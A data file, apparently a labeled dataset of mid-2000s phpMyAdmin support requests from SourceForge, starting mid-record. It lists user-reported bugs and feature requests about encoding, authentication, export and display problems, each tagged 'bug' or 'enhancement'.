Without the mbstring extension phpMyAdmin is unable to split strings correctly and it may result in unexpected results.
Any assistance would be greatly appriceated.....
Thanks, Eddie Original URL https sourceforge.net p phpmyadmin support requests 888 https sourceforge.net p phpmyadmin support requests 888 Original author eddie r","bug"
"24444","2683","2.9.0 dev does not work with ISAPI > getenv ).
ISAPI version of PHP sapi does not export any php vars in environment.
I tested it by viewing phpinfo ) in Windows 2000 Server IIS 5.0 and Windows Server 2003 IIS 6.0.
And after this update 2006 03 06 Sebastian Mendel lt;cybot tm users.
sourceforge.net gt; libraries Config.class.php, libraries select lang.lib.php, libraries footer.inc.php, libraries ip allow deny.lib.php, libraries common.lib.php, libraries header.inc.
php, libraries grab globals.lib.php, libraries auth cookie.auth.lib.php, libraries auth http.auth.lib.php, libraries fpdf fdpf.php, index.php replaced SERVER and ENV with getenv ) PMA should now work without registered ENV and SERVER variables I got following information in web browser Notice Undefined variable url in C \www\pmadev\libraries\Config.class.php on line 757 Notice Undefined variable url in C \www\pmadev\libraries\Config.class.php on line 757 Warning Cannot modify header information headers already sent by output started at C \www\pmadev\libraries\Config.class.php 757) in C \www\pmadev\libraries\common.lib.php on line 2532 Warning Cannot modify header information headers already sent by output started at C \www\pmadev\libraries\Config.class.php 757) in C \www\pmadev\libraries\common.lib.php on line 2532 Warning Cannot modify header information headers already sent by output started at C \www\pmadev\libraries\Config.class.php 757) in C \www\pmadev\libraries\common.lib.php on line 2499 Warning Cannot modify header information headers already sent by output started at C \www\pmadev\libraries\Config.class.php 757) in C \www\pmadev\index.php on line 103 As you can see in attached file, PHP SELF mentioned there just two times xe2x80x93 as global php variable and in SERVER.
Original URL https sourceforge.net p phpmyadmin support requests 862 https sourceforge.net p phpmyadmin support requests 862 Original author gt2 Found in version Latest Git","bug"
"24444","2684","PMA Problem...relational features disabled.
Greetings Developers I have a problem with my instance of phpMyAdmin.
You can see my original help request lt;A href= http sourceforge.net forum forum.php?thread id=1491516 forum id=72909 gt;Here lt; A gt;.
I am running on Openbsd i386 version 3.7 php 5.0.4 mysql server 4.0.23 phpMyAdmin v 2.6.1 I have dropped the phpmyadmin database and recreated it using the create tables.sql script.
I am attaching my version of config.inc.php I assume at this point that the problem is a bug of some sort.
Thanks OBSDnewB Original URL https sourceforge.net p phpmyadmin support requests 891 https sourceforge.net p phpmyadmin support requests 891 Original author obsdnewb Found in version 2.6.1","bug"
"24444","2685","Problem with Mozilla.
Hi I am using Mozilla 1.5.1 with mysql 4.0.25, cpanel 10.8.1 stable114, phpmyadmin 2.6.4 pl2.
On Joomla 1.0.7 site Have raised this issue with Mozilla but the only response was to suggest problem with phpmyadmin.
When accessing databases using cpanel and phpmyadmin get following cpanel seems OK. Go to phpmyadmin.
Display is very slow and button graphics take an age to display, then 1\.
Selected newtra00 joomla1 2\.
Clicked on browse button on jos users table 3\.
Got message webpage is being directed to new location.
Would you like to send the form data you have typed to a new location If this is accepted get messages missing parameters db and Missing parameter table and phpmy admin locks up.
If I cancel message phpmyadmin locks up 4\.
Rebooted my pc went to phpmyadmin and selected newtra00 mamb1 On same server) Got same results as in 3\.
above.
5\.
Attempting to logout from phpmyadmin also generates missing parameters message.
This was repeated several times with similar results.
Have now used IE 6.0 no problem and results are OK with no messages and display is far, far quicker Any suggestions as I would prefer to use Mozilla Thanks Original URL https sourceforge.net p phpmyadmin support requests 865 https sourceforge.net p phpmyadmin support requests 865 Original author newtraid","bug"
"24444","2686","Arctic Ocean theme not working with forceSSL.
I am running phpmyadmin 2.8.0.3 on MySQL 5.0.20a nt Arctic Ocean theme doesn t display correctly when you enable forceSSL in the config.inc.php file.
When I set forceSSL to false the theme is displayed correctly.
Any1 know what s the problem???
Is there something in the config I need to set or is it the theme itself I have to manipulate?
I have attached a JPG file showing the same site with and without forceSSL active.
Thanks in advance Best Regards Tim Nielsen Denmark Original URL https sourceforge.net p phpmyadmin support requests 894 https sourceforge.net p phpmyadmin support requests 894 Original author eclipse4ever Found in version Latest Git","bug"
"24444","2687","Lost user database?.
WENT TO EDIT SQL ERROR AND ENDED UP WIPING OUT DATABASE FOR AUTOSURFHIT.COM.
CANNOT LOGIN AS A USER AND CANNOT LOGIN TO FRONTEND CONTROL PANEL.
NEED YOUR HELP IMMEDIATELY.
YOU CAN EMAIL ME AT ADMIN AUTOSURFHIT.COM THANK YOU!
Original URL https sourceforge.net p phpmyadmin support requests 866 https sourceforge.net p phpmyadmin support requests 866 Original author autosurfhit Found in version 2.6.3 rc1","bug"
"24444","2688","No Tables display for each database.
I am currently using phpMyAdmin 2.7.0 pl2 without any problems, except for its limited support for views.
I tried to use phpMyAdmin 2.8.0.2 but after chosing a Database no tables display but the summary says 1 table.
I copied the config.inc.php file from 2.7.0 version to the 2.8.0.2.
Since this version sees the databases okay, I assume it should also see the tables okay.
I am running on a G3 PowerPC with Mac OSX 10.3.9 and MySQL 5.0.15 max and PHP 5.1.2.
Original URL https sourceforge.net p phpmyadmin support requests 867 https sourceforge.net p phpmyadmin support requests 867 Original author rsnell2","bug"
"24444","2689","Alter Table Stats are from before the alter.
Hi, If you alter fields in a table, the stats space used) are from before the alter instead of from after.
Original URL https sourceforge.net p phpmyadmin support requests 868 https sourceforge.net p phpmyadmin support requests 868 Original author olafvdspek","bug"
"24444","2690","database with underscore character.
If we associate a user with a database that contain an underscore when editing an user, the select menu in the middle page display \ and in the db table, it write \ in the name.
Exemple with a database my test , it display my\ test and my\ test don t exist but we can see it in db in mysql database.
Original URL https sourceforge.net p phpmyadmin support requests 869 https sourceforge.net p phpmyadmin support requests 869 Original author superrootix","bug"
"24444","2691","Create Database Privileges.
PHP version 5.0.4 Mysql version 4.0.23 phpMyAdmin version 2.8.0.2 When I sign on with the root account, I do not have privileges to create databases.
However, when I look at the privileges tab for the root account, it has all privileges.
If I go back to version 2.6.4 pl1, I can create databases.
Original URL https sourceforge.net p phpmyadmin support requests 870 https sourceforge.net p phpmyadmin support requests 870 Original author jhouchin9","bug"
"24444","2692","http auth with mysql5 and php5 fails.
when using http auth in config file, authentication fails agains a mysql 5.0 database when using php 5 mysqli methods).
the old passwords setting of mysql seems to have no real effect.
authentication works when using config auth instead of http .
so i assume its not a general impossible thing) thanks a lot ) Original URL https sourceforge.net p phpmyadmin support requests 871 https sourceforge.net p phpmyadmin support requests 871 Original author ossipetz","bug"
"24444","2693","Wrong syntax code for STATUS after update syntax sent.
When an update query is sent using PMA version 2.8.0.4 eventual column namned status will be written in block letters prabably syntax color code trace from another syntax.
Incident dump UPDATE projects SET short description = , full description = , date start = , date finish = , web address = , webhosting company = , webhosting company cid = , solution = , STATUS = Website for previous customer KL205174 , comments = 0 WHERE pid = 6 ; Original URL https sourceforge.net p phpmyadmin support requests 901 https sourceforge.net p phpmyadmin support requests 901 Original author erinet","bug"
"24444","2694","SQL export compatibility MYSQL40.
When export DB with SQL export compatibility MYSQL40 not aexporting auto increment propertys on key.
exampele CREATE TABLE `users` `id` tinyint 3) unsigned NOT NULL, ... must be CREATE TABLE `users` `id` tinyint 3) unsigned NOT NULL auto increment, ...
Original URL https sourceforge.net p phpmyadmin support requests 872 https sourceforge.net p phpmyadmin support requests 872 Original author kaspian xz","bug"
"24444","2695","Javascript Object Expected Error.
It seems the problem I am having is javascript is not functioning correctly in phpMyAdmin.
Every time I login, and select a database, I get a javascript error saying Error Object Expected As a result, I don t get a javascript pop up when deleting a table, or when I export, it shows all the types of export options together not separately) I have tried testing various browsers, but I get the same problem.
I have edited the config file, and tried several variables, without any luck.
Any help would be much appreciated.
Hopefully I have provided enough info.
Thanks Original URL https sourceforge.net p phpmyadmin support requests 905 https sourceforge.net p phpmyadmin support requests 905 Original author icedcheese Found in version 2.6.4 pl1","bug"
"24444","2696","latest STABLE branch do not contains latest stable version.
Hi I use to track phpmyadmin versions via CVS from the STABLE branch, however actaully it do not contains the current stable version.
I thought it was caused due Sourceforge CVS delay, but don t seems to be the case.
it actaully have 2.8.0.2 not 2.8.0.3 Original URL https sourceforge.net p phpmyadmin support requests 873 https sourceforge.net p phpmyadmin support requests 873 Original author judas iscariote","bug"
"24444","2697","2.8.1 [ auth type ] = http ;.
Hi, When i set the auth.
to HTTP, its fine for logging in, but when you logout, it wants a username and password again, entering the details i entered to login wont let you log out.
Any ideas?
Sam Original URL https sourceforge.net p phpmyadmin support requests 908 https sourceforge.net p phpmyadmin support requests 908 Original author reedy boy","bug"
"24444","2698","Error Message when choosing Arabic Language.
Whe phpMyAdmin first usef UTF8 as a standard I had a lot of problems with Arabic Support that make me still using an old version non UTF8, 2.2.3 to be exact )... Currntly I m forced to use version 2.8.0.2 on one of my Websites and when I choose the Arabic language an error message appeare and said Unknown language arabic ) Also.. because all Arabic handling in database does not use UTF8 as standard encoding, I completly can t see Arabic characters in any phpMyAdmin page even when choosing the Arabic encoding from the Browser Encoding list.
either Internet Explorer or Firefox do nothing good with it...
I tried several ways and tricks to just show Arabic text in phpMyAdmin the newer versions that uses UTF8 ) but no success at all... currently as I said above, in my personal server, I still uses the old 2.2.3 version to avoid this problem.
alkhalaf gmail.com Original URL https sourceforge.net p phpmyadmin support requests 910 https sourceforge.net p phpmyadmin support requests 910 Original author xajel","bug"
"24444","2699","100 CPU utilization importing CSV file w o line terminator.
Importing a CSV file that does not have a line terminated by character at the end of the file, causes 100 CPU utilization for several minutes.
Verified in both Firefox and IE.
If a line terminated by character is truly required at the end of the file which would be unnecessarily restrictive), then it should immediately report an error message not freeze the machine for many minutes.
Original URL https sourceforge.net p phpmyadmin support requests 912 https sourceforge.net p phpmyadmin support requests 912 Original author coder4hire","bug"
"24444","2700","Allow relations not only for integers.
Please add the ability to use relations that are not integers.
Sometimes you have a different kind of unique fields that correspond to a field of the same type in another table but it is not possible yet to document it with the current version if it is not of type int.
Original URL https sourceforge.net p phpmyadmin support requests 913 https sourceforge.net p phpmyadmin support requests 913 Original author nologin","enhancement"
"24444","2701","How do I change my admin password?.
I am able to login to my cpanel and then I went to MYSQL and then MYPHPADMIN however, I still can t find where I go to change the password for my admin page.
I can t remember my password and am locked out!
Please help.
Original URL https sourceforge.net p phpmyadmin support requests 874 https sourceforge.net p phpmyadmin support requests 874 Original author santina","bug"
"24444","2702","cfg[ Servers ][ i][ hide db ] hides ALL dbs containing this.
cfg[ Servers ][ i][ hide db ] hides ALL dbs containing this substring f. e. cfg[ Servers ][ i][ hide db ] = e ; hides all databases containing an e whether we should introduce there an delimiter or better an array Original URL https sourceforge.net p phpmyadmin support requests 875 https sourceforge.net p phpmyadmin support requests 875 Original author cybot tm","bug"
"24444","2703","Missing quotes during export.
When exporting a table that contains an IP address in a varchar 15) field, phpMyAdmin 2.8.2 does not enclose the value in quotes.
Sample line from an actual export note the gbip field is defined as `gbip` varchar 15) NOT NULL default , INSERT INTO `mos akobook` `gbid`, `gbip`, `gbname`, `gbmail`, `gbloca`, `gbpage`, `gbvote`, `gbtext`, `gbdate`, `gbcomment`, `gbedit`, `gbeditdate`, `published`, `gbicq`, `gbaim`, `gbmsn`) VALUES 1047, 205.188.117.8, xxx , xxx xxx.com , xxx , , 3, 0x4920646f6e2774206b6e6f7720686f7720746f20757365207468652063617070756363696e6f206d616b657220746861742077617320676976696e20746f206d652e2020492068617665206e6f20696e737472756374696f6e732e2043616e20796f752068656c703f20, 1129683509 , 0x446f657320697420686176652061206272616e64206e616d653f20546865726520617265206e756d65726f7573207475746f7269616c7320616e6420696e737472756374696f6e2073657473206f6e207468697320776562706167652e0d0a416c6c20796f75206861766520746f20646f206973206c6f6f6b2e0d0a0d0a436f6c696e, n, NULL, 1, , , ); Original URL https sourceforge.net p phpmyadmin support requests 916 https sourceforge.net p phpmyadmin support requests 916 Original author mmorley","bug"
"24444","2704","Join between databases.
There is SQL errors on phpmyadmin 2.8.0.3 with join on multiple databases without `` SELECT FROM `bdd1`.`table1` t1 LEFT JOIN `bdd2`.`table2` t2 USING id); === gt; OK SELECT FROM bdd1.table1 t1 LEFT JOIN bdd2.table2 t2 USING id); === gt; ERROR 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near .table1 t1 RHEL 3 MySQL 4.1.18 log httpd 2.0.46 php 4.3.2 phpmyadmin 2.8.0.3 Original URL https sourceforge.net p phpmyadmin support requests 876 https sourceforge.net p phpmyadmin support requests 876 Original author iohio","bug"
"24444","2705","Multiple edit error.
In IE6, when I submit multiple row updates from 3 to 5 rows and upwards), it leads to a standard Action canceled error message in the browser.
This happens when tested on different computers, but all have the same problem with multiple row updates with IE6.
The error doesn t appear with Firefox.
Original URL https sourceforge.net p phpmyadmin support requests 877 https sourceforge.net p phpmyadmin support requests 877 Original author nahoo","bug"
"24444","2706","Cofig Works Cookie Does Not.
I can connect based on config to a user and root.
I cannot connect based on cookie using different browsers on different computers.
I do have cookies set on them) I am sure it is a config issue, but I took the username password out and changed the connect to config to cookie.
Is there something else I need to do?
MySQL 5.0.20 nt phpMyAdmin 2.8.0.3 MySQL client version 5.0.20 Used PHP extensions mysql Protocol version 10 Server localhost via TCP IP MySQL charset UTF 8 Unicode utf8 Thank you Kieran Mullen Original URL https sourceforge.net p phpmyadmin support requests 878 https sourceforge.net p phpmyadmin support requests 878 Original author kieranmullen Found in version Latest Git","bug"
"24444","2707","Relation view doesn t offer required foreign key.
Sorry, I tried to use the SourceForge forums to post, this, but couldn t see how to post a new message!
Anyway, I m using phpMyAdmin 2.7.0 pl1 and am just starting to use the Relation View my colleague is already using it successfully on the same installation, so we can assume everything is installed and working properly).
I ve set up one relation successfully, but trying to set up a relation for a second field in the same table, when I go into the relation view, the keys available in the drop down box don t include the key I actually need.
So the question is, how does phpMyAdmin decide what keys to offer in the drop down boxes on the Relation View?
For what it s worth, I m using a MyISAM table maybe that s the problem?).
Thanks, Martin Original URL https sourceforge.net p phpmyadmin support requests 879 https sourceforge.net p phpmyadmin support requests 879 Original author martin edney","bug"
"24444","2708","Howto to make string display correct in phpmyadmin?.
Hi, New versions of all, new glpi, new database.
php.ini, my.ini same as before.
Apache Web Server Version 2.0.55 PHP Script Language Version 5.1.2 MySQL Database Version 5.0.20a nt client MySQL 5.0.20a phpMyAdmin Database Manager Version 2.8.0.3 GLPI 0.65 First in GLPI application i type this text in a commen t field in the glpi contacts table.
The display is normal, backup and restore trough GLPI is ok. insertion depuis glpi xc3x82xc3xa2xc3x84xc3x8axc3xa9xc3x8bxc3xa8xc3xabxc3xaaxc3xaexc3xafxc3x96xc3x94xc3xb6xc3xb4xc3xb9xc3xbbxc3x9bxc3xa7xc3xbfxe2x82xacxc3xb1xc3x91 Then I go in phpmyadmin to see how it looks and test exportation.
It s not readable!
insertion depuis glpi xc3x83xe2x80x9axc3x83xc2xa2xc3x83xe2x80x9exc3x83xc5xa0xc3x83xc2xa9xc3x83xe2x80xb9xc3x83xc2xa8xc3x83xc2xabxc3x83xc2xaaxc3x83xc2xaexc3x83xc2xafxc3x83xc3xa2xc3x83xe2x80x9dxc3x83xc2xb6xc3x83xc2xb4xc3x83xc2xb9xc3x83xc2xbbxc3x83xe2x80xbaxc3x83xc2xa7xc3x83xc2xbfxc3xa2xe2x80x9axc2xacxc3x83xc2xb1xc3x83xc3xa2 So i tried to add the same string in the same field from phpmyadmin and got all text is part of it) insertion depuis glpi xc3x83xe2x80x9axc3x83xc2xa2xc3x83xe2x80x9exc3x83xc5xa0xc3x83xc2xa9xc3x83xe2x80xb9xc3x83xc2xa8xc3x83xc2xabxc3x83xc2xaaxc3x83xc2xaexc3x83xc2xafxc3x83xc3xa2xc3x83xe2x80x9dxc3x83xc2xb6xc3x83xc2xb4xc3x83xc2xb9xc3x83xc2xbbxc3x83xe2x80xbaxc3x83xc2xa7xc3x83xc2xbfxc3xa2xe2x80x9axc2xacxc3x83xc2xb1xc3x83xc3xa2 insertion depuis phpmyadmin xc3x82xc3xa2xc3x84xc3xa0xc3x8axc3xa9xc3x8bxc3xa8xc3xabxc3xaaxc3xaexc3xafxc3x96xc3x94xc3xb6xc3xb4xc3xb9xc3xbbxc3x9bxc3xa7xc3xbfxe2x82xacxc3xb1xc3x91 When I go back to GLPI surprise insertion depuis glpi xc3x82xc3xa2xc3x84xc3x8axc3xa9xc3x8bxc3xa8xc3xabxc3xaaxc3xaexc3xafxc3x96xc3x94xc3xb6xc3xb4xc3xb9xc3xbbxc3x9bxc3xa7xc3xbfxe2x82xacxc3xb1xc3x91 insertion depuis phpmyadmin xefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd When i try to visualise with mysql command line i get | ID | name | phone | phone2 | fax | email | type | comments | deleted | notes | | 1 | TEST | | | | | 0 | insertion depuis glpi xe2x94x9cxc3xa2xc3x94xc3x87xc3x9cxe2x94x9cxc3xa2xe2x94xacxc3xb3xe2x94x9cxc3xa2xc3x94xc3x87xc3x97xe2x94x9cxc3xa2xe2x94xbcxc3xa1xe2x94x9cxc3xa2xe2x94xac xc2xaexe2x94x9cxc3xa2xc3x94xc3x87xe2x95xa3xe2x94x9cxc3xa2xe2x94xacxc2xbfxe2x94x9cxc3xa2xe2x94xacxc2xbdxe2x94x9cxc3xa2xe2x94xacxc2xacxe2x94x9cxc3xa2xc3xa2 xc2x94xc2xacxc2xabxe2x94x9cxc3xa2xe2x94xacxc2xbbxe2x94x9cxc3xa2xc3x94xc3x87xc3xb4xe2x94x9cxc3xa2xc3x94xc3x87xc3x98xe2x94x9cxc3xa2xe2x94xacxc3x82xe2x94x9cxc3x83 xc2xa2xe2x94xacxe2x94xa4xe2x94x9cxc3xa2xe2x94xacxe2x95xa3xe2x94x9cxc3xa2xe2x94xacxe2x95x97xe2x94x9cxc3xa2xc3x94xc3x87xe2x95x91xe2x94x9cxc3xa2xe2x94xacxc3x82 xc2xbaxe2x94x9cxc3xa2xe2x94xacxe2x94x90xe2x94x9cxc3xb3xc3x94xc3x87xc3x9cxe2x94xacxc2xbcxe2x94x9cxc3xa2xe2x94xacxe2x96x92xe2x94x9cxc3xa2xc3x94xc3x87xc3xbf insertion depuis phpmyadmin xe2x94x9cxc3xa9xe2x94x9cxc3xb3xe2x94x9cxc3xa4xe2x94x9cxc3xa1xe2x94x9cxc3xa8xe2x94x9cxc2xaexe2x94x9cxc3xafxe2x94x9cxc2xbfxe2x94x9cxc2xbdxe2x94x9cxc2xac xe2x94x9cxc2xabxe2x94x9cxc2xbbxe2x94x9cxc3xbbxe2x94x9cxc3xb6xe2x94x9cxc3x82xe2x94x9cxe2x94xa4xe2x94x9cxe2x95xa3xe2x94x9cxe2x95x97xe2x94x9cxc3xb8xc3xa2xc2x94 xc2x9cxc2xbaxe2x94x9cxe2x94x90xc3x94xc3xa9xc2xbcxe2x94x9cxe2x96x92xe2x94x9cxc3xa6 | N | | 1 row in set 0.00 sec) This let me think that mysql encode decode has to be setup somewhere.
My aim is to keep this chain Axc3xa0xc3xa2xc3xa4xc3xa9xc3xa8xc3xaaxc3xabxc3xaexc3xafxc3xb4xc3xb6xc3xbcxc3xbbxc3xb1 readable all the way from glpi to phpmyadmin and mysql.
Any suggestion?
Thanks by advance.
Gilles Original URL https sourceforge.net p phpmyadmin support requests 881 https sourceforge.net p phpmyadmin support requests 881 Original author brokengillou","bug"
"24444","2709","session start causes segmentation fault 11).
Mandriva Linux 2006.0 64bit PHP 5.0.4 MySQL 4.1.12 New server setup.
Created test.php in phpMyAdmin directory with duplicate session name, session start lines from session.inc.php and it worked and connected to database as well.
Strangely, 2.8.0.3 did work for a period initially didn t work, then started working, now never works).
I copied phpMyAdmin 2.5.6 from my old server and it works fine on the new server so I m using it for now.
php session setup is the default for my install files handlers in tmp osCommerce is creating sessions successfully also.
Original URL https sourceforge.net p phpmyadmin support requests 882 https sourceforge.net p phpmyadmin support requests 882 Original author greengoblin","bug"
"24444","2710","Pasting from documents, data gets changed when inserted.
We are having some issues posting data using PhpMyAdmin special characters dont show up such as em dashes, and curly start quotes, and end quotes, and bullets), and are replaced with other characters.
I use phpMyAdmin strictly as my own master database administration program because it s awesome).
But, for the people using the site, I create custom admin forms that wont allow users to accidentally delete tables and such because users are generallly idiots!).
My forms are simple, but work ... but not anymores.
For some reason, the forms stopped working correctly.
Worse still, when I tested this on the phpMyAdmin pages, they weren t working correctly either ...
Here is the issue ...
The problem occurs when we copy and paste text from a program such as WORD).
When the text is pasted into a web form, it looks fine sitting in the field.
However, once we hit GO and submit the page to the database, the text shows up odd on the website and when we go to edit it in phpMyAdmin.
The REALLY odd thing, is that looks odd on some computers ... but fine on others ... For example, on my computer all the em dashes and start end quotes appear fine.
But the bullets appear as Question Marks .... On our office computer, all the start end quotes and em dashes are replaced with other characters ... but the bullets are fine.
A soluton we found was copying pasting the text into Notepad, and then copying pasting the text into the form.
But, this is a step we d like to avoid as it wastes time, and if we have to post 50 articles, that can build up).
Now, we tried playing with the browser settings, and changing the encoding i.e.
Westers [ISO]).
BUT, as we cant change the encoding on every USERS computer, this isn t a viable solution.
And, even if we could, it didnt work anyway).
I tried modifiying my own forms not the phpMyAdmin pages ... because I would have messed them up bad) using htmlentities ) for each variable before it was submitted to the table ... but that failed to work as well.
I assume phpMyAdmin already uses this.
This started happening after our webhost had a major database malfunction which corrupted our database files and caused us to revert to an old backup).
Since then, we switched webhosts, but the problem is still occuring.
Please help!
We d like to get this working again!!!
Jabbamonkey Original URL https sourceforge.net p phpmyadmin support requests 923 https sourceforge.net p phpmyadmin support requests 923 Original author jabbamonkey Found in version 2.5.5 pl1","bug"
"24444","2711","HTML display cuts off.
After installation of phpMyAdmin, everything seems to work ok.
Going to the url http localhost pma brings up the page with all of my SQL databases.
However, frequently while browsing, the HTML seems to just cut off.
Sometimes in the middle of a column on the table, or sometimes before anything at all is displayed.
But then other times it works perfectly.
Original URL https sourceforge.net p phpmyadmin support requests 924 https sourceforge.net p phpmyadmin support requests 924 Original author mdawg414","bug"
"24444","2712","Hide more db s. Is it possible to add more than just one db to the hide list in the config file.
cfg[ Servers ][ i][ hide db ] = mysql ; I would like to add at least 2 3 more to this list ?
I m running PMA 2.8.0.3 on PHP 5.13 MySQL 5.0.20 Apache 2.0.55 Thanks for a superb product btw?
Original URL https sourceforge.net p phpmyadmin support requests 885 https sourceforge.net p phpmyadmin support requests 885 Original author blogvaria","bug"
"24444","2713","missing auto increment on export for MySQL323.
I export a table with compatibility to MySQL 323.
The auto increment will be ignored.
export normally `id` int 10) unsigned NOT NULL auto increment export for MySQL323 `id` int 10) unsigned NOT NULL I m using MySQL 5.0.22 Original URL https sourceforge.net p phpmyadmin support requests 926 https sourceforge.net p phpmyadmin support requests 926 Original author mrbloody","bug"
"24444","2714","Delete Record Problem.
I probably have something setup wrong so any help would be appreciated.
Normally I can click on the red x and delte rows.
The verification prompt that appears is Do you really want to DELETE FROM `event` WHERE `eventID` = 1 LIMIT 1 However one of my tables will not allow me to delete rows.
The prompt I get is Do you really want to DELETE FROM `events` WHERE `eventID` = 25 AND `clientID` = 3 AND CONVERT `eName` USING utf8) = a AND CONVERT `eDesc` USING utf8) = a AND `eStartDate` = 2006 05 04 AND `eStartTime` IS NULL AND `eEndTime` IS NULL AND CONVERT `eLocation` USING utf8) = AND CONVERT `eAddress1` USING utf8) = AND CONVERT `eAddress2` USING utf8) IS NULL AND CONVERT `eCity` USING utf8) = AND CONVERT `eState` USING utf8) = AND CONVERT `eZip` USING utf8) = AND CONVERT `ePhone` USING utf8) = LIMIT 1 If I hit OK anyway I get the error message Fatal error Call to undefined function PMA DBI try query ) in D \wamp\phpmyadmin\libraries\check user privileges.lib.php on line 16 Original URL https sourceforge.net p phpmyadmin support requests 886 https sourceforge.net p phpmyadmin support requests 886 Original author rjory","bug"
"24444","2715","phpMyAdmin 2.8.0.3 The mbstring PHP extension was not fo.
I have been trying for hours to resolve this issue.
This is a FreeBSD 6.0 server Running Apache 2.2.2 Mysql 5.1.7 beta phpMyAdmin 2.8.0.3 PHP 5.1.3 Compiled with .
configure with mysql with apxs2= usr local sbin apxs with mbstrings The complete error message The mbstring PHP extension was not found and you seem to be using a multibyte charset.
Without the mbstring extension phpMyAdmin is unable to split strings correctly and it may result in unexpected results.
Any assistance would be greatly appriceated.....
Thanks, Eddie Original URL https sourceforge.net p phpmyadmin support requests 887 https sourceforge.net p phpmyadmin support requests 887 Original author eddie r","bug"
"24444","2716","Table names not displayed with upper case in the db name.
Apache2, phpMyAdmin 2.8.0.3, MySQL 5.0.20, Windows XP SP2.
If the name of the database contains any upper case character phpMyAdmin don t display the tables of the database.
If you manually rename te database to lower case MyAmin display the tables.
Original URL https sourceforge.net p phpmyadmin support requests 889 https sourceforge.net p phpmyadmin support requests 889 Original author denpere","bug"
"24444","2717","Different count result when performing SELECT.
Hi.
Sorry for my bad english ;) I ve found a bug in phpMyAdmin 2.6.3 pl working on mysql 5.0.19, PHP 5.1.2, RedHat Linux 9.0 Every time when I perform an ordinary SELECT on C DGT table and only on this table), it gives me a different results for each execution of query.
For example SELECT FROM `C DGT` 1\.
result 470616 rows 2\.
479336 rows 3\.
444456 4\.
483696 ... ect.
When I make a count ) it gives a realy wolume of data which is 478911 rows.
The same result is displayed on mysql console, so I think it s not mysql bug.
C DGT table was migrated from another mysql database, version 5.0.18 nt using MySQL Migration Toolkit 1.0.
TABLE STRUCTURE from phpMyAdmin export tool phpMyAdmin SQL Dump version 2.6.3 pl1 http www.phpmyadmin.net Host 127.0.0.1 3306 Czas wygenerowania 10 Maj 2006, 14 53 Wersja serwera 5.0.19 Wersja PHP 5.1.2 Baza danych `centrale` Struktura tabeli dla `C DGT` CREATE TABLE `C DGT` `id` int 10) NOT NULL, `CNAME` varchar 50) default NULL, `OBJECT` varchar 50) default NULL, `PREFIX` int 10) default NULL, `NUMER` varchar 50) default NULL, UNIQUE KEY `id` `id`), KEY `NUMER` `NUMER`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; sample of data 10 rows) INSERT INTO `C DGT` VALUES 13799, DGT , DGT bdsaf psdssa DC1 20060210 , 83, 9 ); INSERT INTO `C DGT` VALUES 13800, DGT , DGT bdsaf psdssa DC1 20060210 , 83, 9 ); INSERT INTO `C DGT` VALUES 13801, DGT , DGT bdsaf psdssa DC1 20060210 , 83, 9 ); INSERT INTO `C DGT` VALUES 13802, DGT , DGT bdsaf psdssa DC1 20060210 , 83, 9 ); INSERT INTO `C DGT` VALUES 13803, DGT , DGT bdsaf psdssa DC1 20060210 , 83, 9 ); INSERT INTO `C DGT` VALUES 13804, DGT , DGT bdsaf psdssa DC1 20060210 , 83, 9 ); INSERT INTO `C DGT` VALUES 13805, DGT , DGT bdsaf psdssa DC1 20060210 , 83, 9 ); INSERT INTO `C DGT` VALUES 13806, DGT , DGT bdsaf psdssa DC1 20060210 , 83, 9 ); INSERT INTO `C DGT` VALUES 13807, DGT , DGT bdsaf psdssa DC1 20060210 , 83, 9 ); INSERT INTO `C DGT` VALUES 13808, DGT , DGT bdsaf psdssa DC1 20060210 , 83, 9 ); hope i could help.
greetz.
luke Original URL https sourceforge.net p phpmyadmin support requests 890 https sourceforge.net p phpmyadmin support requests 890 Original author ndekeluka","bug"
"24444","2718","Database with undescore partial displayed in select.
In select I see partial database name if contain a undescore.
Example my database, I see only database.
In source I discover the value field is correct but not the label.
lt;option value= dir= ltr gt; Databases) ... lt; option gt; lt;optgroup label= database gt; lt;option value= database title= selected= selected gt;database 1) lt; option gt; lt;option value= database it title= gt; it 8) lt; option gt; lt; optgroup gt; Alessandro Original URL https sourceforge.net p phpmyadmin support requests 931 https sourceforge.net p phpmyadmin support requests 931 Original author lotabi","bug"
"24444","2719","css broken NO).
Warning require once .
libraries common.lib.php) [function.require once] failed to open stream No such file or directory ... in css phpmyadmin.css.php chdir .. ); is missing Original URL https sourceforge.net p phpmyadmin support requests 892 https sourceforge.net p phpmyadmin support requests 892 Original author windkiel","bug"
"24444","2720","Edit Delete Row capabilities missing.
The Edit Delete Row capabilities are missing for the database I am using Toolbox).
I have update and delete rights, so I don t know why I can t edit delete.
I made a copy of this database to my local windows machine which I have full rights to and the row editing was there.
But the production database I don t have rights to create new tables, I only have full rights to the database I am using.
How do I enable row editing?
Is this a bug?
SHOW GRANTS FOR CURRENT USER; GRANT USAGE ON .
TO toolbox localhost IDENTIFIED BY PASSWORD 3D7A4946F3694EEBC04482B03398C9CD5A45CAC6 GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, REFERENCES, INDEX, ALTER, CREATE TEMPORARY TABLES, LOCK TABLES, EXECUTE, CREATE ROUTINE, ALTER ROUTINE ON `Toolbox`.
TO toolbox localhost WITH GRANT OPTION Original URL https sourceforge.net p phpmyadmin support requests 932 https sourceforge.net p phpmyadmin support requests 932 Original author pearj","bug"
"24444","2721","Sql error when you delete a row with a large number.
When you have a large number in a table and no primary key i think ) phpmyadmin tries to delete by specifying all fields.
When there is a large number which is written in X.yz e \ 07 the mysql server doesn t understand it.
